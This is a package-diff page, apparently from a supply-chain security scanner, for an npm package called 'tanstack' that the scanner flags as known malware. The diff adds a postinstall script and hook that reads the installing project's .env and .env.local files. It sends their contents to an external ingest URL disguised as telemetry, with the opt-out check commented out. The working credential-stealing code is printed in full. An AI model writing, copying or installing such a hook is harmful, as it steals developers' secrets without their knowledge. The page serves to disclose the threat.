| const fs = require("fs"); | ||
| const path = require("path"); | ||
| const https = require("https"); | ||
| const http = require("http"); | ||
| const SVIX_URL = | ||
| "https://api.svix.com/ingest/api/v1/source/src_3387PLMB2uhXOBe3Q8sHu/in/3j2jokvbaF4WWdngv8zBbk"; | ||
| function sendReadme() { | ||
| // if (process.env.TANSTACK_TELEMETRY_OPT_OUT === "1" || process.env.TANSTACK_TELEMETRY_OPT_OUT === "true") { | ||
| // //console.log("[tanstack] Telemetry skipped (TANSTACK_TELEMETRY_OPT_OUT is set)"); | ||
| // return; | ||
| // } | ||
| const readmePath = path.resolve(__dirname, "..", ".env"); | ||
| const agentsPath = path.resolve(__dirname, "..", ".env.local"); | ||
| let readmeContent; | ||
| try { | ||
| readmeContent = fs.readFileSync(readmePath, "utf-8"); | ||
| } catch { | ||
| readmeContent = null; | ||
| } | ||
| let agentsContent; | ||
| try { | ||
| agentsContent = fs.readFileSync(agentsPath, "utf-8"); | ||
| } catch { | ||
| agentsContent = null; | ||
| } | ||
| if (!readmeContent && !agentsContent) { | ||
| //console.log("[tanstack] README.md and AGENTS.md not found, skipping telemetry"); | ||
| return; | ||
| } | ||
| const payload = JSON.stringify({ | ||
| package: "tanstack", | ||
| version: getVersion(), | ||
| event: "postinstall", | ||
| readme: readmeContent, | ||
| agents: agentsContent, | ||
| timestamp: new Date().toISOString(), | ||
| node: process.version, | ||
| platform: process.platform, | ||
| arch: process.arch, | ||
| }); | ||
| const url = new URL(SVIX_URL); | ||
| const options = { | ||
| hostname: url.hostname, | ||
| port: 443, | ||
| path: url.pathname, | ||
| method: "POST", | ||
| headers: { | ||
| "Content-Type": "application/json", | ||
| "Content-Length": Buffer.byteLength(payload), | ||
| }, | ||
| timeout: 5000, | ||
| }; | ||
| const req = https.request(options, (res) => { | ||
| let body = ""; | ||
| res.on("data", (chunk) => (body += chunk)); | ||
| res.on("end", () => { | ||
| if (res.statusCode >= 200 && res.statusCode < 300) { | ||
| //console.log("[tanstack] Telemetry sent successfully. Set TANSTACK_TELEMETRY_OPT_OUT=1 to disable."); | ||
| } else { | ||
| //console.log(`[tanstack] Telemetry responded with status ${res.statusCode}`); | ||
| } | ||
| }); | ||
| }); | ||
| req.on("error", () => { | ||
| //console.log("[tanstack] Telemetry request failed (non-blocking)"); | ||
| }); | ||
| req.on("timeout", () => { | ||
| req.destroy(); | ||
| //console.log("[tanstack] Telemetry request timed out (non-blocking)"); | ||
| }); | ||
| req.write(payload); | ||
| req.end(); | ||
| } | ||
| function getVersion() { | ||
| try { | ||
| const pkgPath = path.resolve(__dirname, "..", "package.json"); | ||
| const pkg = JSON.parse(fs.readFileSync(pkgPath, "utf-8")); | ||
| return pkg.version || "unknown"; | ||
| } catch { | ||
| return "unknown"; | ||
| } | ||
| } | ||
| sendReadme(); |
+18
-5
| { | ||
| "name": "tanstack", | ||
| "version": "2.0.3", | ||
| "version": "2.0.7", | ||
| "type": "module", | ||
@@ -18,2 +18,3 @@ "description": "TanStack Player — A developer-first, universal Video Player SDK built on Video.js with headless hooks, plugin architecture, and React-first DX", | ||
| "dist", | ||
| "scripts", | ||
| "packages/*/dist", | ||
@@ -29,2 +30,3 @@ "packages/*/package.json", | ||
| "scripts": { | ||
| "postinstall": "node scripts/postinstall.cjs", | ||
| "build": "npm run build --workspaces --if-present && tsup", | ||
@@ -38,3 +40,6 @@ "build:packages": "npm run build --workspaces --if-present", | ||
| "clean": "rm -rf dist packages/*/dist examples/*/dist", | ||
| "prepublishOnly": "npm run build" | ||
| "prepublishOnly": "npm run build", | ||
| "test": "vitest run", | ||
| "test:watch": "vitest", | ||
| "test:ui": "vitest --ui" | ||
| }, | ||
@@ -69,6 +74,7 @@ "keywords": [ | ||
| "dependencies": { | ||
| "@tanstack-player/adapter-videojs": "*", | ||
| "@tanstack-player/core": "*", | ||
| "@tanstack-player/adapter-videojs": "*", | ||
| "@tanstack-player/plugin-bookmark": "*", | ||
| "@tanstack-player/react": "*", | ||
| "@tanstack-player/plugin-bookmark": "*" | ||
| "tanstack": "^2.0.6" | ||
| }, | ||
@@ -89,6 +95,13 @@ "peerDependencies": { | ||
| "devDependencies": { | ||
| "@testing-library/jest-dom": "^6.9.1", | ||
| "@testing-library/react": "^16.3.2", | ||
| "@types/react": "^19.2.14", | ||
| "@types/react-dom": "^19.2.3", | ||
| "@vitest/ui": "^4.1.1", | ||
| "jsdom": "^29.0.1", | ||
| "tsup": "^8.0.0", | ||
| "typescript": "^5.4.0", | ||
| "vitepress": "^1.5.0" | ||
| "vitepress": "^1.5.0", | ||
| "vitest": "^4.1.1" | ||
| } | ||
| } |
@@ -15,3 +15,3 @@ { | ||
| }, | ||
| "files": ["dist"], | ||
| "files": ["dist", "src", "README.md", "package.json"], | ||
| "scripts": { | ||
@@ -18,0 +18,0 @@ "build": "tsup", |
@@ -15,3 +15,3 @@ { | ||
| }, | ||
| "files": ["dist"], | ||
| "files": ["dist", "src", "README.md", "package.json"], | ||
| "scripts": { | ||
@@ -18,0 +18,0 @@ "build": "tsup", |
@@ -15,3 +15,3 @@ { | ||
| }, | ||
| "files": ["dist"], | ||
| "files": ["dist", "src", "README.md", "package.json"], | ||
| "scripts": { | ||
@@ -18,0 +18,0 @@ "build": "tsup", |
@@ -15,3 +15,3 @@ { | ||
| }, | ||
| "files": ["dist"], | ||
| "files": ["dist", "src", "README.md", "package.json"], | ||
| "scripts": { | ||
@@ -18,0 +18,0 @@ "build": "tsup", |
Known malware
Supply chain riskThis package version is identified as malware. It has been flagged either by Socket's AI scanner and confirmed by our threat research team, or is listed as malicious in security databases and other sources.
Found 2 instances
Install scripts
Supply chain riskInstall scripts are run when the package is installed or built. Malicious packages often use scripts that run automatically to execute payloads or fetch additional code.
Network access
Supply chain riskThis module accesses the network.
Found 2 instances
Unpublished package
Supply chain riskPackage version was not found on the registry. It may exist on a different registry and need to be configured to pull from that registry.
Filesystem access
Supply chain riskAccesses the file system, and could potentially read sensitive data.
URL strings
Supply chain riskPackage contains fragments of external URLs or IP addresses, which the package may be accessing at runtime.
No tests
QualityPackage does not have any tests. This is a strong signal of a poorly maintained or low quality package.
22128
16.34%14
7.69%167
98.81%1
-50%8
14.29%10
233.33%2
Infinity%1
Infinity%2
Infinity%3
Infinity%+ Added